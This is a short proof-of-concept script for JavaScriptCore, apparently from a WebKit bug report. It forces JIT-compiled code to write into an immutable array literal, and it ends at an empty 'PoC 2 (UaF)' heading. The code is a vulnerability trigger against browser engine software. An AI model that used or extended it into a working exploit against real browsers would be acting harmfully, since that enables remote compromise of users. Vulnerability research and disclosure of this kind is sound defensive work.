// ./jsc --useConcurrentJIT=false ~/test.js function set(arr, value) { arr[0] = value; } function getImmutableArrayOrSet(get, value) { let arr = [1]; if (get) return arr; set(arr, value); // This inlinee is for having checkArray not take the paths using the structure comparison. set({}, 1); } function main() { getImmutableArrayOrSet(true); for (let i = 0; i < 100; i++) { getImmutableArrayOrSet(false, {}); } let arr = getImmutableArrayOrSet(true); print(arr[0] === 1); } main(); PoC 2 (UaF):